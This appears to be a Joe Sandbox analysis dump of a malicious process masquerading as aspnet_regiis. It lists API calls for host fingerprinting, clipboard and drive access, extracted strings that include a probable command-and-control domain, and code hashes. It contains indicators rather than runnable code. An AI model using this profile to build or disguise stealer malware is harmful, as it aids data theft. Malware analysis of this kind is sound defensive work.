72a369 14737 72a430 14736->14737 14737->14737 14740 72b100 14737->14740 14739 72a479 14743 72b190 14740->14743 14741 72b1b5 14741->14739 14742 75e0a0 2 API calls 14742->14743 14743->14741 14743->14742 14744 75ea29 14745 75ea50 14744->14745 14745->14745 14746 75ea8e 14745->14746 14751 75e110 LdrInitializeThunk 14745->14751 14750 75e110 LdrInitializeThunk 14746->14750 14749 75eb59 14750->14749 14751->14746 14752 75e3a9 14753 75e3b2 GetForegroundWindow 14752->14753 14754 75e3c9 14753->14754 14755 750b2b CoSetProxyBlanket 14757 74c9eb 14759 74c8e2 14757->14759 14758 74cab5 14759->14758 14761 75e110 LdrInitializeThunk 14759->14761 14761->14759 14762 72ef53 CoInitializeEx CoInitializeEx 14763 74d893 14764 74d896 FreeLibrary 14763->14764 14765 74dbc9 14764->14765 14765->14765 14766 74dc30 GetComputerNameExA 14765->14766 14772 729d1e 14773 729d40 LoadLibraryExW 14772->14773 14775 729da5 14773->14775 14776 729e74 LoadLibraryExW 14775->14776 14777 729e85 14776->14777 14778 75c55b RtlAllocateHeap 14779 728600 14781 72860f 14779->14781 14780 728a48 ExitProcess 14781->14780 14782 728624 GetCurrentProcessId GetCurrentThreadId 14781->14782 14785 728a31 14781->14785 14783 728650 SHGetSpecialFolderPathW 14782->14783 14784 72864c 14782->14784 14787 728880 14783->14787 14784->14783 14794 75e080 14785->14794 14788 728964 GetForegroundWindow 14787->14788 14789 728982 14788->14789 14789->14785 14791 72b7b0 FreeLibrary 14789->14791 14792 72b7cc 14791->14792 14793 72b7d1 FreeLibrary 14792->14793 14793->14785 14797 75f970 14794->14797 14796 75e085 FreeLibrary 14796->14780 14798 75f979 14797->14798 14798->14796 14799 72e687 14800 72e6a0 14799->14800 14805 759280 14800->14805 14802 72e77a 14803 759280 11 API calls 14802->14803 14804 72e908 14803->14804 14804->14804 14806 7592b0 CoCreateInstance 14805->14806 14808 7594e4 SysAllocString 14806->14808 14809 759906 14806->14809 14812 759574 14808->14812 14810 759916 GetVolumeInformationW 14809->14810 14820 759934 14810->14820 14813 7598f5 
SysFreeString 14812->14813 14814 75957c CoSetProxyBlanket 14812->14814 14813->14809 14815 75959c SysAllocString 14814->14815 14816 7598eb 14814->14816 14818 7596a0 14815->14818 14816->14813 14818->14818 14819 759701 SysAllocString 14818->14819 14823 759728 14819->14823 14820->14802 14821 7598d6 SysFreeString SysFreeString 14821->14816 14822 7598cc 14822->14821 14823->14821 14823->14822 14824 75976f VariantInit 14823->14824 14825 7597c0 14824->14825 14826 7598bb VariantClear 14825->14826 14826->14822 14827 75eb88 14828 75eba0 14827->14828 14831 75ebde 14828->14831 14834 75e110 LdrInitializeThunk 14828->14834 14829 75ec4e 14831->14829 14833 75e110 LdrInitializeThunk 14831->14833 14833->14829 14834->14831 14835 74d34a 14836 74d370 14835->14836 14836->14836 14837 74d3ea GetPhysicallyInstalledSystemMemory 14836->14837 14838 74d410 14837->14838 14838->14838
Strings
Memory Dump Source
• Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID: "7t$%"$+A#C=]=_$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$eN$g}zh$lev-tolstoi.com$p7t$s$wdnf$~SS}$rp
• API String ID: 0-4093609724
• Opcode ID: f31c448eb4fe0e9d3ef91d4e9c040e310fd7184f9ea5414d87c4b6ef60433545
• Instruction ID: 9af55455f426ca3eb6c4f93e1716201f8ca0fa7499d2f799f1fe0f67d34b89e5
• Opcode Fuzzy Hash: f31c448eb4fe0e9d3ef91d4e9c040e310fd7184f9ea5414d87c4b6ef60433545
• Instruction Fuzzy Hash: 8AB225B1A08311CFD714CF28D8917ABBBE2FF85314F19856CE49A9B391D7789901CB91

Control-flow Graph (function 759280; executed and not-executed basic blocks, graph data omitted)
APIs
• CoCreateInstance.OLE32(0076368C,00000000,00000001,0076367C,00000000), ref: 007594CF
• SysAllocString.OLEAUT32(00001F7A), ref: 00759550
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0075958E
• SysAllocString.OLEAUT32(8DFD93FD), ref: 00759625
• SysAllocString.OLEAUT32(4A105420), ref: 00759706
• VariantInit.OLEAUT32(?), ref: 00759774
• VariantClear.OLEAUT32(?), ref: 007598BC
• SysFreeString.OLEAUT32 ref: 007598DF
• SysFreeString.OLEAUT32(?), ref: 007598E5
• SysFreeString.OLEAUT32(00000000), ref: 007598F6
• GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 0075992E
Strings
Similarity
• API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
• String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
• API String ID: 2573436264-1335595022
• Opcode ID: ed79fd50b3388aaae2a7b13bff3d11354feb211db28a2ac1f30cc387d22096ad
• Instruction ID: cba5e0853bd06c54a2cb4384677a3f40a87ebf3c6abc0aa8d7a6295bb0c3523e
• Opcode Fuzzy Hash: ed79fd50b3388aaae2a7b13bff3d11354feb211db28a2ac1f30cc387d22096ad
• Instruction Fuzzy Hash: 60222676A083519BD310CF24C880B9BBBE2EFC5315F18892CFA9597391D7B9D945CB82
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
                                                                                                                                                                                                                                              • API String ID: 0-510280711
                                                                                                                                                                                                                                              • Opcode ID: 5d19576bcd517124df7ded3150a925184391655d591a9d05c152fc6523213cb0
                                                                                                                                                                                                                                              • Instruction ID: c83a7e81de91ce9110027e6719765f5c9d3ff1aac06e4446ac5be3bca19ef9a5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d19576bcd517124df7ded3150a925184391655d591a9d05c152fc6523213cb0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9C248B1608350DFD7248F28D8957ABB7E1FF95314F59893CE4DA8B292E7389801CB52

Control-flow Graph: [graph rendering omitted; legend: Executed / Not Executed; the graph's basic blocks lie in the 0x743xxx-0x744xxx range and include calls to RtlExpandEnvironmentStrings and GetLogicalDrives]
Strings
Memory Dump Source
• Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID: ":t$+A#C=]=_$=]=_$_^]\$eN$p7t$rp
• API String ID: 0-1551846742
• Opcode ID: b369ce7e0940ecf50619161834e8b2f4c2e832bd7256fd4fa4f26ddd45bbe622
• Instruction ID: 4f69a35749ae385a665242d39d02e6a1d9d62c7081d03ebae5d0438a442ec85f
• Opcode Fuzzy Hash: b369ce7e0940ecf50619161834e8b2f4c2e832bd7256fd4fa4f26ddd45bbe622
• Instruction Fuzzy Hash: 9C4216B5A04311CFD718CF68D8916AABBB2FF89310F19C2ACD4469B395D778D942CB90

Control-flow Graph: [graph rendering omitted; legend: Executed / Not Executed; the graph's basic blocks lie in the 0x72fxxx-0x732xxx range and include a call to RtlExpandEnvironmentStrings]
Strings
Memory Dump Source
• Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID: )$+$>$@$F$L$[$`
• API String ID: 0-4163809010
• Opcode ID: e25e23813288d8cced58a27095851c3eeeb31bf1d7099d7c09e10be87b42a0d9
• Instruction ID: fb99c8f8fb3ea83f1730e638e1123c0c0cbab8f99a86cd9cad2e40fe1f90ef0c
• Opcode Fuzzy Hash: e25e23813288d8cced58a27095851c3eeeb31bf1d7099d7c09e10be87b42a0d9
• Instruction Fuzzy Hash: 8F52A17260C7908BD324DB38C5953AFBBE1AB95320F598A2DE4D9C7382D6788941CB43

Control-flow Graph: [graph rendering omitted; legend: Executed / Not Executed; the graph covers the function at 0x728600-0x728a4a, whose API calls are listed under APIs]
APIs
• GetCurrentProcessId.KERNEL32 ref: 00728624
• GetCurrentThreadId.KERNEL32 ref: 0072862E
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 007287FA
• GetForegroundWindow.USER32 ref: 00728974
  • Part of subcall function 0072B7B0: FreeLibrary.KERNEL32(00728A31), ref: 0072B7B6
  • Part of subcall function 0072B7B0: FreeLibrary.KERNEL32 ref: 0072B7D7
• ExitProcess.KERNEL32 ref: 00728A4A
Strings
Memory Dump Source
• Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
Similarity
• API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID: b]u)$}$}
• API String ID: 3676751680-2900034282
• Opcode ID: 01bf413a82cac4f2cb28100926ba03fbfcf0c592c6adf4d66b2537c6f1fc0c2d
• Instruction ID: 7c36a2c56b07705ea1e7d7fdaef0cae537cb7bae96adcd75ec73db4e1aa8cc05
• Opcode Fuzzy Hash: 01bf413a82cac4f2cb28100926ba03fbfcf0c592c6adf4d66b2537c6f1fc0c2d
• Instruction Fuzzy Hash: C0C1F673E187144BC708DF69D84125AF7D6ABC8710F0EC52EA898EB351EA78DD048BC6

Control-flow Graph
(rendered graph not reproduced; basic blocks 74d34a-74d73c, with calls to 75fe00, 73e960 and GetPhysicallyInstalledSystemMemory)
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0074D3EE
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                              • String ID: ><+
                                                                                                                                                                                                                                              • API String ID: 3960555810-2918635699
                                                                                                                                                                                                                                              • Opcode ID: 584c3a034909a9cbae7d827595797129ea116f9af029e91f8489cfb80e232744
                                                                                                                                                                                                                                              • Instruction ID: 14292a18f56717f549c806981e73528c3246c7e51c8066ed6dc420073e0a1ed3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 584c3a034909a9cbae7d827595797129ea116f9af029e91f8489cfb80e232744
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CC1D1756047818FD725CF2AC490762FBE2BF9A310F29859DC4DA8B792C739E806CB50
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: @Ukx$
                                                                                                                                                                                                                                              • API String ID: 2994545307-3636270652
                                                                                                                                                                                                                                              • Opcode ID: 026b607482578f1019abe5e46be1872548a1e29201f821c014a05b659442353d
                                                                                                                                                                                                                                              • Instruction ID: 0f46cd281f8ac787a4069f7b9ccceb0cbbe6edb1e7b44d1faa626cc3251d9b00
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 026b607482578f1019abe5e46be1872548a1e29201f821c014a05b659442353d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2B14532B087504BC728CE28D8D52ABB7A2EBC5314F1DCA3CDD975B395DA399C058B91
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LdrInitializeThunk.NTDLL(0076148A,00000002,00000018,?,?,00000018,?,?,?), ref: 0075E13E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: _^]\
                                                                                                                                                                                                                                              • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                              • Opcode ID: c1e0b65b52bd6cc254146d12dea5bcf22822990074bc5839f54ce0563f909ad6
                                                                                                                                                                                                                                              • Instruction ID: 2884cda12d421904cd04ed16978f01c895a064f56fb8cf9afbb2228bb5028a21
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1e0b65b52bd6cc254146d12dea5bcf22822990074bc5839f54ce0563f909ad6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED7126B1A0C3005BD71C9E28DC92B7BB6A2DF81318F19883CE4869B292E37CDC15C756
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: =<32
                                                                                                                                                                                                                                              • API String ID: 2994545307-852023076
                                                                                                                                                                                                                                              • Opcode ID: e9baa35bf90bcf2afab3228fd7698d483301c12e6d1c6e14e4e41388649c6bb7
                                                                                                                                                                                                                                              • Instruction ID: 0a30d7b931f42d0a339c5be185d048529e62c3664ebdd53c7235d11cfb58299d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9baa35bf90bcf2afab3228fd7698d483301c12e6d1c6e14e4e41388649c6bb7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43314834604305ABE7149E14DC95B7FB3A5EB84760F5C852CED86972E0D778DC809782
Strings
Memory Dump Source
• Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
Similarity
• API ID:
• String ID: ,-
• API String ID: 0-1027024164
• Opcode ID: 772652a312bc01ea33eb150ba92d2694d37d3bfd7bdd312528b1b0a6296dc8da
• Instruction ID: 2bde2d3c8e733567f3868ddba02a77613ace95a2600cbae71d26fe70d6801272
• Opcode Fuzzy Hash: 772652a312bc01ea33eb150ba92d2694d37d3bfd7bdd312528b1b0a6296dc8da
• Instruction Fuzzy Hash: 052137A1A15300CBC714AF29CD52537B7B1EF82361F89C618E4968B351F778CD45C7A2
Strings
Similarity
• API ID: InitializeThunk
• String ID: @
• API String ID: 2994545307-2766056989
• Opcode ID: a65b8c1dde3c5ee8c3ab5f10e2118beb55ac1d23edcd2cbd321e38be4076f717
• Instruction ID: 344e78634db6e978fb65e4565f8591c19a025dccd7c1226a56fa01c4f10d41ab
• Opcode Fuzzy Hash: a65b8c1dde3c5ee8c3ab5f10e2118beb55ac1d23edcd2cbd321e38be4076f717
• Instruction Fuzzy Hash: E53103715083049BC324DF58D8D166FBBE4EBC5314F14892CEA9A93290D7799848CB96
Similarity
• API ID: EnvironmentExpandStrings$Clipboard$Global$CloseDataLockLongOpenUnlockWindow
• String ID:
• API String ID: 1780199113-0
• Opcode ID: 7d58e1fc67e67b15ccb894f96cddb4e2a0d9e3a802dbecf1aa0bd2f08b47c081
• Instruction ID: 575e99e5ebc3563198b2296325e79af44e1760d76e0eafd45fa3b48a8845d30e
• Opcode Fuzzy Hash: 7d58e1fc67e67b15ccb894f96cddb4e2a0d9e3a802dbecf1aa0bd2f08b47c081
• Instruction Fuzzy Hash: 23314EE9B01250ABE90576313C6BA7F61575BD0718F0C142CF50B27383EE6EF916A197
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
• Instruction ID: c5a7daae527b77246c27beb81b28209e5ada635ad548018f072646a3453ede13
• Opcode Fuzzy Hash: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
• Instruction Fuzzy Hash: 6021C537A627184BD3108E54DCC97917761E7D9328F3E86B8C9249F3D2C97BA91386C0

Control-flow Graph (graph image not included in this extract)
APIs
• LoadLibraryExW.KERNEL32(?,00000000), ref: 00729D98
• LoadLibraryExW.KERNEL32(?,00000000), ref: 00729E78
Strings
Similarity
• API ID: LibraryLoad
• String ID: CK{
• API String ID: 1029625771-1506268401
• Opcode ID: cd21534984915b12ec73a2ba147000f03e8ef6e8819d34489054e5d826f117be
• Instruction ID: 2fe5fdc2cc001203619e3caef31d9a999e6f4c33bb4304f968fa205f3acb91e6
• Opcode Fuzzy Hash: cd21534984915b12ec73a2ba147000f03e8ef6e8819d34489054e5d826f117be
• Instruction Fuzzy Hash: D5412274D003409FE7249F7898D6A9A7F71FB06324F40429CD4902F3A6C735980ACBE2

Control-flow Graph (graph image not included in this extract)
APIs
• FreeLibrary.KERNEL32(?), ref: 0074D898
• GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0074DC43
Strings
Similarity
• API ID: ComputerFreeLibraryName
• String ID: ;87>
• API String ID: 2904949787-2104535307
• Opcode ID: cb1520372f8f11990b06f7b0fcdc34c695a173f1f037521cdb5d811bb5e2f447
• Instruction ID: 5a2cdd8fc2e61618275f792877bc01d5a721f6ad13f767cd19c963ab57ad68be
• Opcode Fuzzy Hash: cb1520372f8f11990b06f7b0fcdc34c695a173f1f037521cdb5d811bb5e2f447
• Instruction Fuzzy Hash: EA21C4B1504742CFDB328F25D850726BFE2AF57301F18C699D4D68B292DB789C42CB61
Control-flow Graph
[Control-flow graph of the function at 0074D893-0074DBFB: a FreeLibrary call followed by a loop and a GetComputerNameExA call at 0074DC30-0074DC72; executed and not-executed blocks are distinguished in the original graph]
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0074D898
                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0074DC43
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                              • String ID: ;87>
                                                                                                                                                                                                                                              • API String ID: 2904949787-2104535307
                                                                                                                                                                                                                                              • Opcode ID: 8075a18870f393edfec174d046d159a1d9a44367e7f24b1d974889eb2462fe44
                                                                                                                                                                                                                                              • Instruction ID: d97b691f351a3c9ba1ed21fd5849f325182b8eee28eec304362fbd7178479d37
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8075a18870f393edfec174d046d159a1d9a44367e7f24b1d974889eb2462fe44
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E911C8B1501742CFD7218F35DC50766BBE2EF47311F19C694D4D68B292EB789841CB51
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0075E3BA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2020703349-3019521637
                                                                                                                                                                                                                                              • Opcode ID: c966422e33c375d5dd9c6372cd45a0accf2ba44c38ce344de297d6daaa52b23b
                                                                                                                                                                                                                                              • Instruction ID: 086470e005cdf95a4dcdab8bb7bfad4d0100560b4fa50134fbbafb774d9bcc2a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c966422e33c375d5dd9c6372cd45a0accf2ba44c38ce344de297d6daaa52b23b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42112B76E409554BDF08CB79DC171EA77A2B7C432572D86B9CC17E3290DA7C49068A84
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002), ref: 0072EF57
                                                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0072F09C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
